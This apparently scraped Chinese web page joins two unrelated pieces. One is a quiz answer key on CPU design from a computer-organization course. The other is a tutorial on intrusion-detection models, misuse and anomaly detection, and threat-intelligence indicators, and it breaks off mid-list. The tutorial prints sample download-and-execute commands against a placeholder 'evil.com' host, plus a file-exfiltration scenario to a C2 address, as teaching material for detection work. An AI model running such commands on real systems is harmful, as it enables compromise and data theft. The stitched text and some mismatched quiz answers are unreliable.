精华内容
下载资源
问答
  • 《计算机组成原理》第六章_中央处理_华中科技大学_MOOC慕课_检测与作业
    千次阅读
    2021-12-19 11:50:16

    选择题

    PC存放的是下一条指令的地址,故PC的位数与(主存地址寄存器MAR )的位数相同

    用以指定待执行指令所在主存地址的寄存器是( 程序计数器PC

    指令寄存器的位数取决于( 指令字长

    某计算机字长32位,在执行指令的顺序寻址时,PC的增量值为( 4

    某计算机采用微程序控制器的微指令格式采用编码方式组织,某互斥命令组由4个微命令组成,则微指令寄存器中相应字段的位数至少需( 3 )

    在多周期CPU中,( 一条指令的功能通过执行一个微程序来实现

    相对于微程序控制器,硬布线控制器的特点是( 指令执行速度快,指令功能的修改和扩展难

    微程序和微指令相比,( 微程序控制器比硬连线控制器相对灵活

    ‏冯•诺依曼计算机中指令和数据均以二进制形式存放在存储器中,CPU依据( 指令和数据的访问时间不同 )来区分它们

    某计算机指令集中包含有RR型运算指令、访存指令Load、Store、分支指令Branch和跳转指令Jump。若采用单周期数据通路实现该指令系统,若指令存储器和数据存储器的时延都是3ns;ALU时延为2ns;寄存器文件读写时延都是1ns。在不考虑多路复用器、控制单元、PC、符号扩展单元和传输线路等延迟的情况下,该计算机时钟周期至少为( 10ns )。

    ‎在控制器的控制方式中,机器周期内的时钟周期个数可以不相同,这种控制方式属于( 异步控制 )。

    ​一定不属于冯•诺依曼机体系结构必要组成部分的是()(单选)
    A.RAM
    B.Cache
    C.ROM
    D.CPU

    通常情况下,不包含在中央处理器(CPU)芯片中的部件是() (单选)
    A.寄存器
    B.ALU
    C.控制器
    D.DRAM

    下列寄存器中,对汇编语言程序员不透明的是( )(单选)
    A.存储器数据寄存器(MDR)
    B.程序计数器(PC)
    C.存储器地址寄存器(MAR)
    D.条件状态寄存器

    ‏下列不属于控制器功能的是( ) (单选)
    A.指令的顺序控制
    B.算术与逻辑运算
    C.操作控制
    D.异常控制

    ‌不会影响指令执行流程的是 ( ) (单选)
    A.指令的功能
    B.操作数的寻址方式
    C.CPU内总线结构
    D.ALU的进位方式

    ‍以下给出的事件中,无须异常处理程序进行处理的是( )。(单选)
    A.访问cache缺失
    B.缺页故障
    C.存储访问地址越界
    D.除数为0

    ‍当CPU内部cache发生缺失时,CPU如何处理( ) (单选)
    A.进行异常处理
    B.等待数据载入
    C.进程调度
    D.执行其他指令

    某型MIPS32指令架构的单周期CPU,其数据通路结构如下图
    在这里插入图片描述
    ‏执行指令sub rd, rs, rt 时,应由控制器产生的控制信号PCSrc、regDst、aluSrc、memtoReg、RegWrite分别是( 0、1、0、0、1 )

    下列有关控制器各部件功能的描述中,正确的的是( ) (多选)
    A.通过将PC按当前指令长度增量,可实现指令的按序执行
    B.控制单元是其核心部件,用于对指令操作码译码并生成控制信号

    C.IR称为指令寄存器,用来存放当前指令的操作码
    D.PC称为程序计数器,用于存放将要执行的指令的地址

    下列有关取指令操作部件的叙述中,正确的是( )(多选)
    A.取指令操作的延时主要由存储器的取数时间决定
    B.单周期数据通路中PC寄存器写使能信号一直有效
    C.取指令操作可以和下条指令地址的计算操作同时进行

    D.单周期数据通路中数据和指令都存放在同一存储器中

    下列有关取指令操作部件的叙述中,正确的是( )(多 选)
    A.取指令操作的延时主要由存储器的取数时间决定
    B.PC在单周期数据通路中不需要“写使能"控制信号
    C.取指令操作可以和下条指令地址的计算操作同时进行

    D.单周期CPU数据通路中需使用指令寄存器存放取出的指令

    下列关于取指阶段指令流程的描述中,正确的是( ) (多选)
    A.CPU内总线结构影响取指流程
    B.取指流程中只有一条数据通路
    C.取指流程包含取指和PC增量流程
    D.不同PC增量方式影响取指流程

    ‌下列有关指令周期的叙述中,正确的是( )。(多选)
    A.乘法指令和加法指令的指令周期总是一样长
    B.指令周期的第一个阶段一定是取指令阶段
    C.一个指令周期可由若干个机器周期或时钟周期组成
    D.单周期CPU中的指令周期就是一个时钟周期

    关于程序计数器PC的叙述,正确的是( ) (多选)
    A.执行调用指令后,PC的值一定是被调用过程的入口地址
    B.执行无条件转移指令后,其值变成转移目标地址

    C.程序执行过程中其值不会减小
    D.指令顺序执行时,PC的值总是自动加1

    ‏设PC、AR、IRA、DR、Ri等分别表示CPU中的程序计数器、地址寄存器、指令寄存器中的形式地址字段、数据缓冲寄存器和通用寄存器。从寻址方式的角度考虑,以下可能存在的操作是( )(多选)
    A.AR ← (PC)
    B.AR ← (Ri)
    C.Ri ← (DR)
    D.DR ← (IRA)

    下列关于指令执行流程控制信号同步的描述中,正确的是( ) (多选)
    A.同一时钟周期内允许有多个控制信号同时有效
    B.同步控制方式会增加指令的CPI
    C.控制信号的同步方式可能不唯一

    D.同一微命令不会在同一指令的不同CPU周期多次有效

    ‌下列有关数据通路的叙述中,正确的是( ) (多选)
    A.数据通路执行的功能由控制部件送出的控制信号选择控制
    B.数据通路由若干操作元件和状态元件连接而成
    C.ALU属于操作元件,用于执行各类算术和逻辑运算

    D.通用寄存器属于状态元件,但不包含在数据通路中

    下列有关多周期数据通路和单周期数据通路比较的叙述中,正确的是() (多选)
    A.多周期中部分器件可以复用
    B.指令执行过程中,单周期处理器中有效的控制信号取值一直不变,而多周期处理器中的有效控制信号的值可能会发生改变

    C.单周期处理器的CPI总比多周期处理器的CPI大
    D.一条指令执行过程中,单周期数据通路中的每个部件只能被使用一次,而在多周期中同一个部件可使用多次

    下列关于取指阶段指令流程的描述中,正确的是( ) (多选)
    A.CPU内总线结构影响取指流程
    B.取指流程包含取指和PC增量流程

    C.取指流程中只有一条数据通路
    D.不同PC增量方式影响取指流程

    下面是有关MIPS架构的R-型指令数据通路设计的叙述正确的是( ) (多选)
    A.在R-型指令数据通路中,一定存在一条路径使ALU输出被送到某个寄存器
    B.执行R-型指令时,通用寄存器堆的“写使能”控制信号一定为“1”
    C.在R-型指令数据通路中,一定会有一个具有读口和写口的通用寄存器组
    D.在R-型指令数据通路中,一定有一个ALU用于对寄存器读出数据进行运算

    下面是有关MIPS架构的lw/sw指令数据通路设计的叙述正确的是( ) (多选)
    A.在lw/sw指令数据通路中,一定有一个符号扩展部件用于偏移量的扩展
    B.数据存储器的“写使能”信号在lw指令执行时为“0”,在sw指令执行时为“1”
    C.在lw/sw指令数搌通路中,ALU的控制信号一定为“add”(即ALU做加法)
    D.寄存器堆的“写使能”信号在lw指令执行时为“1”,在sw指令执行时为“0”

    更多相关内容
  • 入侵检测技术框架总论

    千次阅读 多人点赞 2020-08-06 18:26:02
    入侵检测0x1:入侵检测通用模型`1. CIDF体系结构 `1)事件产生(event generators)2)事件分析(event analyers)3)事件数据库(event databases)4)响应单元(response units)`2. CIDF规范语言 ``3. CIDF...

    1. 引言,网络安全态势理解

    对态势的理解是人们组合、分析、解读和保留信息的过程。在态势提取的基础上,我们可以采取一些列方法和技术来对安全态势进行进一步的理解和处理,这其中包括安全检测和分析、态势指标构建和态势评估等。

    本文我们将重点对网络安全检测和分析的相关技术进行讨论。

    0x1:网络安全检测的描述

    网络安全检测是指通过对采集来的数据进行检查,并根据观察到的异常事件和数据产生告警的过程,这个过程也称为网络安全检测机制。

    这种检测可以通过以下几种技术来完成:

    • 入侵检测的技术:这是最常用的一种技术
    • 入侵相应技术
    • 入侵取证技术

    当已经采集到的安全数据通过预处理和验证并在其中发现异常时,就会进入这个过程。一旦网络安全检测机制生成告警数据,且这些数据可供给安全人员进行分析,这一过程将宣告结束,就能够进入网络安全分析环节中。

    0x2:安全分析

    安全分析并非机械化过程并非机械化过程,不能单纯靠软件自动完成,它对人的能力要求较高,需要安全分析人员的高度参与,且没有统一的、固定的标准,主观性较强。

    2. 入侵检测

    所谓入侵检测,是指对入侵行为的发觉,它通过从计算机网络或系统中的若干关键点收集信息,并对这些信息进行分析,从而发现网络或系统中是否有违反安全策略的行为和遭到攻击的迹象。

    具体实施入侵检测的软件与硬件的结合就是入侵检测系统(IDS),它通过收集计算机系统和网络的信息并对这些信息加以分析,对被保护系统进行安全审计、监控、攻击识别以及做出实时的反应。

    入侵检测和安全异常定义关系十分密切,关于安全异常的定义,可以参阅这篇文章。

    0x1:入侵检测通用模型

    入侵检测是通过检测计算机网络和系统,以发现违反安全策略的事件的过程。但并非所有的网络安全数据都会被分析或者值得分析,对于需要进行分析的数据,我们统称为事件。入侵检测就是针对事件进行分析处理的。

    一个典型的入侵检测系统至少应包括3个功能模块:

    • 提供事件记录流的信息源
    • 发现入侵迹象的分析引擎
    • 基于分析引擎的相应部件

    DARPA提出的CIDF(公共入侵检测框架)阐述了入侵检测的通用模型,如下图,
    在这里插入图片描述

    CIDF是一套规范,它定义了IDS表达检测信息的标准语言以及IDS组件之间的通信协议。符合CIDF规范的IDS可以共享检测信息,相互通信,协同工作,还可以与其他系统配合实施统一的配置响应和恢复策略。

    CIDF的主要作用在于集成各种IDS使之协同工作,实现各IDS之间的组件重用,所以CIDF也是构建分布式IDS的基础。

    CIDF的规格文档由四部分组成,分别为:

    • 体系结构(the common intrusion detection framework architecture):体系结构阐述了一个标准的IDS的通用模型
    • 规范语言(a common intrusion specification language):规范语言定义了一个用来描述各种检测信息的标准语言
    • 内部通讯(communication in the common intrusion detection framework):内部通讯定义了IDS组件之间进行通信的标准协议
    • 程序接口(common intrusion detection framework APIs):程序接口提供了一套标准的应用程序接口(API函数)

    1. CIDF体系结构

    CIDF的体系结构文档阐述了一个IDS的通用模型,它将一个IDS分为以下四个组件:

    • 事件产生器(event generators)
    • 事件分析器(event analyers)
    • 事件数据库(event databases)
    • 响应单元(response units)

    1)事件产生器(event generators)

    CIDF将IDS需要分析的数据统称为事件(event),它可以是基于网络的IDS从网络中提取的数据包,也可以是基于主机的IDS从系统日志等其他途径得到的数据信息。

    CIDF组件之间是以通用入侵检测对象(generalized intrusion detection objects,GIDO)的形式交换数据的,一个GIDO可以表示在一些特定时刻发生的一些特定事件,也可以表示从一系列事件中得出的一些结论,还可以表示执行某个行动的指令。

    CIDF中的事件产生器负责从整个计算环境中获取事件,但它并不处理这些事件,而是将事件转化为GIDO标准格式提交给其他组件使用,显然事件产生器是所有IDS所需要的,同时也是可以重用的。

    2)事件分析器(event analyers)

    CIDF中的事件分析器接收GIDO,并分析他们,然后以一个新的GIDO形式返回分析结果。

    3)事件数据库(event databases)

    CIDF中的事件数据库负责CIDO的存储,它可以是复杂的数据库,也可以是简单的文本文件。

    4)响应单元(response units)

    CIDF中的响应单元根据CIDO做出反应,它可以是终止进程、切断连接、改变文件属性,也可以只是简单的报警。

    2. CIDF规范语言

    CIDF的规范语言文档定义了一个公共入侵标准语言(Common intrusion specification language,CISL),各IDS使用统一的CISL来表示原始事件信息、分析结果和响应指令,从而建立了IDS之前信息共享的基础。CISL是CIDF的最核心也是最重要的内容。

    3. CIDF内部通讯

    CIDF将各组件之间的通信划分为三个层次结构:

    GIDO层(GIDO layer):GIDO层负责对传输信息的格式化(例如标准json结构体),正是因为有了GIDO这种统一的信息表达格式,才使得各个IDS之间的互操作成为可能
    消息层(Message layer):消息层负责对传输的信息进行加密认证,然后将其可靠地从源传输到目的地。消息层不关心传输的内容,它只负责建立一个可靠的传输通道
    传输层(Negotiated Transport layer):不属于CIDF规范,可以采用很多现有的传输机制来实现
    

    4. CIDF程序接口

    CIDF也对各组件之间的信息传递格式、通信方法和标准API进行了标准化。在现有的IDS中,经常用数据采集部分、分析部分、响应部分和日志来分别代替事件产生器、事件分析器、响应单元和事件数据库这些术语。

    Relevant Link:

    https://wenku.baidu.com/view/6bfdfa4385254b35eefdc8d376eeaeaad0f316d4.html
    http://xueshu.baidu.com/usercenter/paper/show?paperid=21e5eb92dcce8622f82fca4cf0ab4123&site=xueshu_se
    http://www.doc88.com/p-9415295880161.html
    https://www.docin.com/p-960726121-f2.html
    

    3. 入侵检测系统分类

    0x1:根据检测所用数据源进行分类

    根据检测所用数据的来源不同,可将入侵检测系统分为以下三类:

    • 基于主机的入侵检测系统(HIDS)
    • 基于网络的入侵检测系统(NIDS)
    • 基于混合数据源的入侵检测系统(HIDS+NIDS)

    1. 基于主机的入侵检测系统(HIDS)

    此种类型的数据来源主要是:

    • 被监测系统的操作系统事件日志
    • 应用程序的事件日志
    • 系统调用日志(syscall)
    • 端口调用
    • 安全审计日志(eventlog)

    主机入侵检测主要面向不通过网络的本地攻击。

    2. 基于网络的入侵检测系统(NIDS)

    此种类型的数据源是网络上的原始数据包,利用一个运行在混杂模式下的网络适配器类实时监视并分析通过网络进行传输的所有通信业务。

    该类型不依赖于被监测同的主机操作系统,能检测到基于主机的入侵检测系统发现不了的网络攻击行为,提供实时的网络行为检测,且具有较好的隐蔽性。但缺点是无法实现对加密信道和基于加密信道的应用层协议数据的解密,导致对某些网络攻击的检测率较低。

    3. 基于混合数据源的入侵检测系统(HIDS+NIDS)

    0x2:根据检测分析方法进行分类

    1. 误用检测系统(基于知识的检测)

    它通过收集非正常操作的行为特征,建立相关的特征库,当监测的用户或系统行为与库中的记录相匹配时,即认为这种行为是入侵。

    它根据已知入侵攻击的信息(知识、模式等)来检测系统中的入侵和攻击,其前提是假定所有入侵行为和手段都能识别并表示成一种模式(攻击签名),那么所有已知的入侵都可以用匹配的方法发现。

    误用检测的优点是误报率低,对计算能力要求不高,局限在于只能发现已知攻击,对未知攻击无能为力,且模式库难以统一定义,特征库也必须不断更新。

    2. 异常检测系统(基于行为的检测)

    异常检测首先总结正常操作应该具有的特征(用户轮廓),当用户活动与正常行为有重大偏差时即被认为是入侵。

    由于入侵活动并不总是与异常活动相符合,因此其通常做法是构造异常活动集并从中发现入侵性活动子集。

    从技术实现性上来讲,异常检测有3个关键:

    • 特征:异常检测首先要建立用户的”正常“行为特征轮廓,这个正常模型选取的特征量
      • 既要能够准确体现用户行为特征
      • 又要能够使模型最优化
      • 以最少的特征覆盖用户行为
    • 阈值:异常检测一般先建立正常的特征轮廓并以此作为比较基准,这个基准即为阈值
      • 阈值选得过大,漏报率高
      • 阈值选得过小,误报率就高
    • 比较频率的选择:比较频率是指经过多长时间比较当前行为和已建立的正常行为特征轮廓来判断入侵的发生与否,即所谓的时间窗口
      • 经过的时间过长,检测的漏报率会高
      • 经过的时间过短,检测的误报率会高
      • 正常行为特征轮廓会不断更新,这也会影响比较频率

    3. 误用和异常检测混合的入侵检测系统

    0x3:根据入侵检测方式进行分类

    根据入侵检测工作方式不同,可将入侵检测系统分为以下两类:

    实时检测系统:在线式检测系统,是指对网络数据包、主机审计数据等进行实时监测并分析,可以快速反应。
    非实时检测系统:也称为离线式检测系统,是指通过事后分析审计事件和文件等,从中检测出入侵攻击。
    

    4. 入侵检测的分析方法

    入侵检测分析方法主要包括误用检测、异常检测,和协议分析方法。我们下面分别讨论:

    0x1:误用检测

    误用检测是较早出现的入侵检测分析方法,属于第二代入侵检测技术,它是基于知识(模式)的检测方法,根据已知的入侵模式来检测入侵。

    主要包括以下几种类型:

    • 模式匹配方法
    • 专家系统方法
    • 状态转换方法

    1. 模式匹配方法

    这是最基本、最简单的误用检测方法,它将已知的入侵特征转换为模式,存放在模式数据库中,在检测过程中将捕获的事件与模式数据库中的入侵模式进行匹配,若匹配成功则认为有入侵行为发生。

    入侵者通常会利用系统或网络中的弱点来实施攻击,而这些弱点可以被编成某种模式,形成一个模式库,如果入侵者的攻击方式正好能匹配上入侵检测系统中的模式库,那么就可以认为入侵行为发生。

    误用检测非常依赖于模式库,这个模式库是对误用行为的一个解释集,包含了大量对入侵指示器已知的具体行为的描述信息。

    然而,对于模式的定义和描述并不固定,准确度也并不是能百分百保证,这就造成了该类检测方法的误报率和漏报率两头都存在难以平衡的问题。例如下面的例子:

    某恶意下载的攻击载荷如下,

    curl http://evil.com -o evil.sh | sh

    通过正则表达式对这种误用行为模式进行概括描述为,

    curl\s+http:.(\s±\w+){0,}\s±o\s+..(sh|pl)\s*|sh

    但是这里存在着漏报和误报的问题,例如某正常用户管理员可能会执行下列指令,用于自动化的批量运维部署,

    curl http://good.com -o good.sh

    这里面的本质问题在于:

    对误用行为的模式抽象存在维度模糊性,通过正则表达式对文本的概括抽象所代表的维度上,无法有效对”误用“和”合法“的行为模式进行区分,所以就无法进行有效的误用检测。

    解决这个困局的一个思路是”升维“或者”维度切换“,在一个维度无法区分的向量,换到另一个维度也许就很容易定义和区分。例如从命令行判断维度转换为url对应的样本内容检测上。

    同时,误用检测基于已知攻击的假设使得其只能检测到已知入侵,而对于未知入侵则无能为力。

    2. 专家系统方法

    基于专家系统的入侵检测方法是通过将安全专家的知识表示成IF-THEN规则,形成专家知识库,然后,运用推理算法进行检测入侵。

    编码规则说明攻击的必要条件作为IF的组成部分,当规则的左边的全部条件都满足时,规则的右边的动作才会执行。

    入侵检测的开发者并不需要理解专家系统的内部功能和过程,但需要编写决定规则引擎和规则的代码,规则集的每条入侵检测规则都对应某个入侵脚本场景。

    从本质上说,专家系统方法是模式匹配方法的升级,在很多工业实践场景中,专家系统的IF-THEN规则,就是由模式匹配规则组成,也即所谓的”与或非组合模式匹配规则“,通过组合多个模式匹配规则,来获得单个模式匹配规则所无法取得的效果。

    3. 状态转换方法

    状态转换方法使用系统状态和状态转换表达式描述和检测已知的入侵。

    状态状态分析由R.Kemmerer提出,即将状态转换图应用于入侵行为的分析。状态转换法将入侵过程看作是一个行为序列,这个行为序列使得系统由初始状态转入被入侵状态。

    分析时首先针对每一种入侵方法确定系统的初始状态和被入侵状态,以及导致状态转换的条件,即导致系统进入被入侵状态必须执行的操作(特征事件)。然后用状态转换图来表示每一个状态和特征事件,这些事件被集成于模型中,所以检测时不需要一个个地审计记录。

    但是,状态转换时针对事件序列分析,所以不善于分析复杂的事件,而且不能检测与系统状态无关的入侵。

    在实际的工程实践中,我们会借助马尔科夫概率转移矩阵来对入侵事件进行二步图建模,并通过二步图的概率累乘计算得到某个会话的异常程度计量。

    但是这里会有两个比较大的问题,

    • 如果用于训练二步概率转移矩阵的数据集只有正常行为,而不包含任何恶意行为,即”以白滤黑“。那么如果异常行为出现,会在概率转移矩阵中无法找到对应元素,那么为了平滑化,会置一个很小的概率值,这样从结果上看,就近乎等同于”基于历史基线的非白即黑“的异常发现,虚警率会很高
    • 如果用于训练的数据集只包含恶意行为,而不包含任何正常行为,即”以黑找黑“,那么又会陷入和模式匹配类似的困境,就是对未知的新攻击方式检测率较低

    4. 模型推理方法

    对于入侵检测来说,我们常常可以用UEBA的方法论来对原子事件进行建模分析,但是UEBA最大的问题在于,单纯从行为的角度发现的异常,并不一定就代表着实际的入侵。

    为了解决这个问题,我们可以用模型推理这个新的视角来看待异常行为问题。将攻击者行为的知识描述为【攻击者目的:攻击者达到此目的的可能行为步骤:攻击后获得的结果】,例如:

    • 【下载恶意脚本:wget http://evil.com/evil.sh; chmod 744 evil.sh; ./evil.sh:发现脚本文件落盘;检测到该文件为恶意文件】

    模型推理方法的好处在于,扩大了入侵检测的维度范围,原本从单纯行为层面不好检测的事件,通过攻击者目的或者攻击后获得的结果,可以辅助检测,同时检测结果也反过来对攻击步骤进行标记。

    5. 基于信誉的检测

    基于信誉的检测是基于特征检测的一个子集,用于检测我方受保护主机是否连接了曾参与过恶意行动的恶意互联网主机。这从本质上决定了基于信誉的检测只能依靠一系列的简单规则,通常是:

    • IP地址
    • DNS域名
    • HTTP URL访问

    基于信誉的检测在网络安全中是一种非常重要的检测手段,常常被称为基于威胁情报的检测(内生、外生),我们接下来详细讨论一下。

    1)受害信标和特征

    IOC是可用于客观描述网络入侵事件,以与平台无关方法表示的任意信息片断。

    • 既包括命令控制(command and control,C2)服务器的IP地址那样的简单信标
    • 也包括表明某个邮件服务器被用于恶意SMTP转发的一套复杂信标

    IOC可以有不同的形式和大小,还能通过多种途径表示为不同检测机制所接受的格式。一旦IOC被获得并以平台指定语言或格式应用,比如Snort规则或Bro格式文件,它就成为特征的一部分。一个特征可以包括一个或多个IOC。

    1.1)主机信标和网络信标

    根据最常见的分类方式,信标会被分为基于主机和基于网络两类。

    基于主机的IOC是一种可以客观描述入侵事件的信息片断,可在主机发现,一些通用的基于主机的信标包括:

    • 注册表键值
    • 文件名
    • 文本字符串
    • 进程名
    • 互斥量
    • 文件哈希
    • 用户账号
    • 目录路径

    基于网络的IOC也是一种可以客观描述入侵事件的信息片断,可在主机间被捕获,一些通用的基于网络的信标包括:

    • IPv4地址
    • IPv6地址
    • X509证书哈希
    • 域名
    • 文本字符串
    • 通信协议
    • 文件名
    • URL
    1.2)静态信标和可变信标

    对于静态信标(static indicator)而言,每个变量都有明确的定义。静态信标有三个变种:

    • 原子信标:一般是指比较小且更为具体的信标,它们无法被分解为更小的部分,但在入侵背景的描述方面具有一定意义。这类信标包括
      • IP地址
      • 文本字符串
      • 主机名
      • 电子邮件地址
      • 文件名
    • 计算信标:计算信标由特定事件数据的计算结果产生。这类信标包括
      • 哈希值
      • 正则表达式
      • 统计结果,例如
        • 单位时间内对外发起SSH尝试次数判定为正在发起暴力破解
        • 单位时间内某个特定url pattern遭到大量连续访问判定为遭受了cc攻击
    • 行为信标:行为信标由原子信标和计算信标按某些逻辑形式组合而来,通常能够提供一些有用的内容。这种信标可以是一套包括文件名、匹配哈希值或文本字符串和正则表达式的组合数据

    它们的逻辑依属关系如下图:
    在这里插入图片描述

    以一个假设的入侵场景为例,通过分析网络和主机获取的数据,判定发生了下列事件序列,

    • 1.某个用户层收到一封来自 evil@qq.com 的电子邮件,邮件主题写着”人员工资表“,附件是 Payroll.pdf,该 PDF 文件的MD5哈希为36eba1e1e343279857ea7f69a597324e
    • 2.该用户打开这个pdf文件,触发了名为”kernel32.dll“文件的下载行为,这个下载后的文件MD5哈希为93d9127b377d7781e92f64d2d28b99ad,下载链接为 http://www.evil.com/kernel32.dll
    • 3.下载后的文件会覆盖 C:\Windows\System32\kernel32.dll 文件
    • 4.这个 DLL 中的代码被执行后,会通过9966端口与IP地址为192.0.2.75的主机的SSH服务建立连接
    • 5.一旦连接建立,这个恶意程序将在受害者机器上搜索全部DOC、DOCX及PDF文件,并将找到的文件通过SSH连接传送到敌方主机(192.0.2.75)

    上述事件代表了一条冗长的行为信标,它过于复杂。

    为了有效地协调基于特征、基于异常和基于统计的检测机制,首先需要把信标拆解为更有用的片断,以确保它们适用于检测后继内容。结果就是会产生下列行为(behavioral,B)信标:

    • B-1:某个用户收到来自 evil@qq.com 的电子邮件,主题为”人员工资表“,附件名为 Payroll.pdf。该 PDF 文件的 MD5哈希值为 36eba1e1e343279857ea7f69a597324e
    • B-2:MD5哈希值为 93d9127b377d7781e92f64d2d28b99ad 的 kernel32.dll 文件下载自 http://www.evil.com/Kernel32.dll
    • B-3:C:\Windows\System32\Kernel32.dll 文件被同名恶意文件覆盖,恶意文件的 MD5哈希值为 93d9127b377d7781e92f64d2d28b99ad
    • B-4:受害主机尝试与敌方主机 192.0.2.75 建立SSH连接,端口为 9966
    • B-5:通过 9966 端口以加密连接发送 DOC、DOCX、PDF 文件到 192.0.2.75 主机

    接下来,将这些行为信标拆解为独立的原子(atomic,A)信标和计算(computed,C)信标,结果如下:

    • C-1:MD5哈希值为 36eba1e1e343279857ea7f69a597324e
    • C-2:MD5哈希值为 93d9127b377d7781e92f64d2d28b99ad
    • A-1:敌方域名为 www.evil.com
    • A-2:电子邮件为 evil@qq.com
    • A-3:邮件主题为”人员工资表“
    • A-4:文件名为 Payroll.pdf
    • A-5:文件名为 kernel32.dll
    • A-6:地方IP为 192.0.2.75
    • A-7:端口为 9966
    • A-8:协议为 SSH
    • A-9:文件类型为 DOC、DOCX、PDF
    • A-10:文件名为 Kernel32.dll

    上面一共提供了5个行为信标,1个计算信标,10个原子信标,可以将其合并到检测机制中。这样就将信标转换为适用于检测机制的特征,如下:

    • C-1/2:用于检测已知哈希值的反病毒特征
    • A-1:用于检测任意与地方域名建立连接的 Snort 或 Suricata 特征
    • A-2:用于检测从敌方邮件地址接收邮件的 Snort 或 Suricata 特征
    • A-3:用于检测邮件主题的 Snort 或 Suricata 特征
    • A-3:用于检测邮件主题的 Bro 脚本
    • A-4/C1:用于检测经网络传输的文件名或MD5哈希值的Bro脚本
    • A-5/C2:用于检测邮件主题的Bro脚本
    • A-5/C2:用于检测网络中传输文件名为 Kernel32.dll 或文件名为特定MD5哈希值的Bro脚本
    • A-6:用于检测与指定IP地址通信的 Snort 或 Suricata 特征
    • A-7/A-8:用于检测指向 9966 端口的 SSH 通信的 Snort 或 Suricata特征
    • A-10:用于检测 Kernel32.dll 文件被篡改的 HIDS 规则

    可以看到,检测由单个事件产生的变化无常的信标,可以有很多不同的方法。

    根据受保护系统的不同架构,需要具备多套监测机制,以应用单独信标形成的特征。最终确定哪种方法最适合特定IOC的检测,取决于网络基础设施、检测机制的差异、以及IOC相关情报的差异。

    对于可变信标(dynami indicator)而言,为的是更好地发现未知安全威胁,有时需要考虑使用可变信标。

    这类信标通常产生于一个攻击行为可以导致的序列事件,并用于判断变量是否存在。从本质上看,它可以发现理论上的攻击行为,而不只是已经发生过的攻击。根源在于其分析对象是攻击所采用的特定技术手段,而不是某个孤立的对手所实施的攻击个案。

    还是上面同样的例子,我们来看一下可变信标的表现。这次是基于理论攻击场景,而不是基于已经真实发生过的攻击场景。

    • 1.用户收到一封带有恶意附件的电子邮件
    • 2.用户打开邮件,触发异常从恶意域名的文件下载行为
    • 3.该文件被用于改写系统文件,将其替换为恶意文件
    • 4.恶意文件中的代码会被执行,与恶意服务器建立加密连接
    • 5.一旦连接建立,大量数据由该系统向外泄露

    上述步骤表现为多个行为信标,行为信标又进一步包含变换的原子信标和计算信标。齐总部分信标列举如下:

    • VB-1:用户收到一封带有恶意附件的电子邮件
      • VA-1:邮件地址
      • VA-2:邮件主题
      • VA-3:恶意电子邮件源域
      • VA-4:恶意电子邮件源IP地址
      • VA-5:恶意附件文件名
      • VC-1:恶意附件MD5哈希
    • VB-2:用户打开邮件,触发一次从恶意域的文件下载行为
    • VB-3:该文件被用于改写系统文件,将其替换为恶意文件
    • VB-4:恶意文件中的代码会被执行,以非标准端口与恶意服务器建立加密连接
      • VA-8:外部命令控制(C2)服务器IP地址
      • VA-9:外部命令控制(C2)服务器端口
      • VA-10:外部命令控制(C2)服务器协议
    • VB-5:一旦连接建立,大量数据由该系统向外泄露

    如上列出有10个潜在的原子信标、2个变化的计算信标、5个变化的行为信标。

    现在,我们可以将这些信标新城特征,使它们适用于相应的检测机制。可变信标通常可被反复应用或组合使用,以适用于检测更多的攻击场景:

    • VB-1(VA-3/VA-4)VB-2(VA-6)VB-4(VA-8)VB-5(VA-8):用于检测连接黑名单中已知 IP 地址或域名的 Snort 或 Suricata 规则
    • VB-1(VA-5/VC-1)VB-2(VA-7/VC-2):用于实现下载文件并检查其文件名或 MD5哈希是否位于黑名单的 Bro 脚本
    • VB-1(VA-5/VC-1)VB-2(VA-7/VC-2):用于实现下载文件并送入沙箱进行初步分析的 Bro 脚本
    • VB-2(VA-6/VA-7/VC-2):用于检测文档中是否有启动浏览器行为的HIDS特征
    • VB-3:用于检测是否有系统文件被覆盖的HIDS特征
    • VB-4(VA-9/VA-10)VB-5:用于检测通过非标准端口加密通信的 Bro 脚本
    • VB-4(VA-9/VA-10)VB-5:用于检测通过非标准端口加密通信的 Snort 或 Suricata 规则
    • VB-5:专门编写的脚本,实现统计会话数据,发现工作站对外的大量流量

    更一般地说,可变信标中的攻击行为序列,本质上是对原始行为的一种元规则抽象描述。同一个可变信标下,可以对应于无限的行为信标,然后行为信标又进一步分解为原子信标和计算信标。

    可变信标部分可用于各项检测,尤其适用于对未知攻击的检测。

    2)信誉度的判定 - 信标如何产生?

    根据定义,信誉度是对某人或某物具有特殊习惯或特点的普遍性意见。应用到网络防御场景中,主机的信誉度可能是正值,也可能是负值,或者为0.

    组织判定一台主机信誉度为负值的原因有很多,一般来说有如下方法:

    • 某个可以公开访问的系统可能遭到入侵或被用于托管恶意文件,导致其信誉度为负值,即所谓的恶意下载源
    • 在某些企业间谍活动猖獗的行业,因窃取知识产权的威胁,竞争对手相关的IP范围可能信誉度为负值
    • 在政府和国防网络领域,那么已知属于不友好国外政府的主机通常信誉值为符合
    • 曾经遭到到入侵的主机的信誉值在一定时间内为负值
    • 某些黑产机房
    • 对于某些IDC环境中,来自非本国的IP访问,常常被认为是信誉度较低的行为

    0x2:异常检测

    异常检测(anormaly detection)是指根据非正常行为(系统或用户)和资源非正常使用情况检测出入侵行为。异常检测是一种基于行为的检测方法,它的通用性较强,可以检测出未知的攻击模式。

    异常检测的关键问题在于正常使用轮廓(profile)的建立以及如何利用该轮廓对当前的系统/用户行为进行比较,从而判断出于正常轮廓的偏离程度。但这里存在几点主要挑战:

    • 用于建立使用轮廓的特征选择是一个非常有挑战的事情,也即所谓的特征工程抽象难题。主要的难点在于下面几个方面:
      • 选哪些特征可以表征入侵,这涉及到一个互信息问题,因为不是每个特征统计量都和入侵有直接关系,例如单位时间进程启动数就和入侵没有强相关,而很可能只是管理员在编译源代码
      • 特征的数量维度,单维度的特征可能很难完整表征入侵,但是多维特征的统计建模对计算复杂度的影响又是非常剧烈的
    • 正常用户的行为可能是经常改变的,这导致正常用户行为轮廓的概率分布并不固定,这就会导致误报率的波动
    • 正常用户的行为轮廓概率分布并不收敛集中,而是分布在一个相对十分广泛的区间内,有时甚至会和某些异常行为的概率分布存在部分交叠,这就同时导致了误报和漏报的问题
    • 在用户数目众多,或工作目的经常改变的环境中,会遇到所谓的大数据问题。在这种复杂业务场景环境下,系统/用户的正常描述应该是不断修正和更新的,甚至检测器所使用的特征度量也需要不断调整,但往往异常检测模型的特征向量组在建模期间就已经固定下来了

    异常检测是目前学界和工业界的重点研究方向,目前存在多种异常入侵检测方法,如:

    • 贝叶斯统计
    • 机器学习
    • 神经网络

    1. 基于统计的异常检测方法

    统计方法首先给信息对象,如

    • 系统用户
    • 网络连接
    • 落盘文件
    • 进程启动
    • 目录
    • 设备
